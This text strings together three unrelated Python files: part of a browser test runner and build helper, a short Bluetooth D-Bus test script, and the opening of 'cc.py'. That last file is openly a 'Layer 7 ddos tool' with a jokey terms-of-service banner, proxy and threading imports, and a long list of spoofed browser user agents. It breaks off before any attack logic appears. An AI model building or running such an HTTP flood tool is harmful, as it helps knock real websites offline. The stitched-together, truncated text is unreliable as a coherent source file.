self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdentical(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'USE_PTHREADS=1' in args and self.is_wasm_backend():
# wasm2js does not support threads yet
also_asmjs = False
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
compilers). This cache is just during the test runner. There is a different
concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
env = Building.get_building_env(native, True, cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
Building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
test1.py
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
#startBackGroundEvents.start()
startTests.main()
|
cc.py
|
#!/usr/bin/python3
#Coded by Leeon123
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
print ('''
///// ///// /////////////
CCCCC/ CCCCC/ | CC-attack |/
CC/ CC/ |-----------|/
CC/ CC/ | Layer 7 |/
CC///// CC///// | ddos tool |/
CCCCC/ CCCCC/ |___________|/
>--------------------------------------------->
Python3 version 1.7 (Add Post Attack Mode)
C0d3d by Lee0n123
===============================================
--> Use 443 Port Auto Enable SSL <--
TOS:
Don't Attack Government Website.
===============================================''')
useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
